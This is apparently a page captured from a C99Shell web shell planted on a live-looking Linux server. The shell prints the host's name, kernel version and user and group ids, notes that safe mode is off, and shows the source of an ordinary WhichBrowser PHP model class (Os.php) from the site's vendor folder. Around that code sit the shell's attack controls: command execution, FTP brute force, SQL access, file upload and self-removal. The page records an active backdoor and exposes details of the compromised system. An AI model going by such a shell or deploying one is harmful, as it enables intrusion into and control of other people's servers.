!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/whichbrowser/parser/src/Model/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Os.php (2.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace WhichBrowser\Model;

use 
WhichBrowser\Model\Primitive\NameVersion;

class 
Os extends NameVersion
{
    
/**
     * @var \WhichBrowser\Model\Family      $family     To which family does this operating system belong
     */
    
public $family;

    
/** @var string */
    
public $edition;

    
/** @var boolean */
    
public $hidden false;


    
/**
     * Set the properties to the default values
     *
     * @param   array|null  $properties  An optional array of properties to set after setting it to the default values
     *
     * @internal
     */

    
public function reset($properties null)
    {
        
parent::reset();

        unset(
$this->family);
        unset(
$this->edition);

        
$this->hidden false;

        if (
is_array($properties)) {
            
$this->set($properties);
        }
    }


    
/**
     * Return the name of the operating system family
     *
     * @return string
     */

    
public function getFamily()
    {
        if (isset(
$this->family)) {
            return 
$this->family->getName();
        }

        return 
$this->getName();
    }


    
/**
     * Is the operating from the specified family
     *
     * @param  string   $name   The name of the family
     *
     * @return boolean
     */

    
public function isFamily($name)
    {
        if (
$this->getName() == $name) {
            return 
true;
        }

        if (isset(
$this->family)) {
            if (
$this->family->getName() == $name) {
                return 
true;
            }
        }

        return 
false;
    }


    
/**
     * Get the name and version in a human readable format
     *
     * @return string
     */

    
public function toString()
    {
        if (
$this->hidden) {
            return 
'';
        }
        
        return 
trim($this->getName() .
            (!empty(
$this->version) && !$this->version->hidden ' ' $this->getVersion() : '')) .
            (!empty(
$this->edition) ? ' ' $this->edition '');
    }


    
/**
     * Get an array of all defined properties
     *
     * @internal
     *
     * @return array
     */

    
public function toArray()
    {
        
$result = [];

        if (!empty(
$this->name)) {
            
$result['name'] = $this->name;
        }

        if (!empty(
$this->family)) {
            
$result['family'] = $this->family->toArray();
        }

        if (!empty(
$this->alias)) {
            
$result['alias'] = $this->alias;
        }

        if (!empty(
$this->edition)) {
            
$result['edition'] = $this->edition;
        }

        if (!empty(
$this->version)) {
            
$result['version'] = $this->version->toArray();
        }

        if (isset(
$result['version']) && empty($result['version'])) {
            unset(
$result['version']);
        }

        return 
$result;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--